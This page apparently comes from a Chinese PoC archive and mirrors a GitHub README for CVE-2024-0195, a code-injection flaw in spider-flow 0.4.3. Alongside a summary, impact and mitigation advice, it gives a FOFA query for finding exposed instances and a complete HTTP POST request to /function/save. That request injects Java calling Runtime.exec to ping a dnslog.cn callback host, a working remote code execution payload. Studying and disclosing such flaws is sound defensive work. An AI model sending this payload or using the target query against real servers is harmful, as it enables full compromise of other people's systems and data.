目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2024-0195 PoC — spider-flow 安全漏洞

来源
https://github.com/hack-with-rohit/CVE-2024-0195-SpiderFlow
关联漏洞
标题:spider-flow 安全漏洞 (CVE-2024-0195)
Description:spider-flow是ssssssss-team开源的一个爬虫平台。 spider-flow 0.4.3版本存在安全漏洞。攻击者利用该漏洞导致代码注入。
介绍
# CVE-2024-0195 Improper Control of Generation of Code ('Code Injection') Critical 2024

# Summary
CVE-2024-0195 is a critical code injection vulnerability in the spider-flow 0.4.3 web application, specifically in the FunctionService.saveFunction function of the FunctionController.java file. An attacker can remotely inject malicious code which gets executed on the server. This allows complete compromise of the application.

# Impact..
This vulnerability is extremely severe as it allows remote code execution on the server hosting the vulnerable spider-flow application. An attacker could fully compromise the server, steal sensitive data, install malware or crypto miners, and use it for further attacks inside the network. The confidentiality, integrity and availability of the application and server are all critically impacted.

# Patch
A patched version is not explicitly mentioned, so patching currently does not seem to be an option. The vulnerability was publicly disclosed and exploits are available, so immediate mitigation is critical.

# Mitigation
Until an official patch is released, spider-flow 0.4.3 should be immediately taken offline or access restricted only to trusted networks/users. Web application firewalls or other input validation controls could potentially be configured to detect and block attempted code injection attacks as an interim mitigation. However, these are not full solutions and the vulnerable version should be upgraded as soon as a fixed release is available.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


# Exploitation
FOFA : app="spiderflow"

✔ Proof of concept 

```
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
```
文件快照

 [4.0K]  /data/pocs/268dc5dccc8ebc65ec462cc26f6ae70e41a6be8b
├── [2.1K]  CVE-2024-0195.yaml
└── [1.9K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →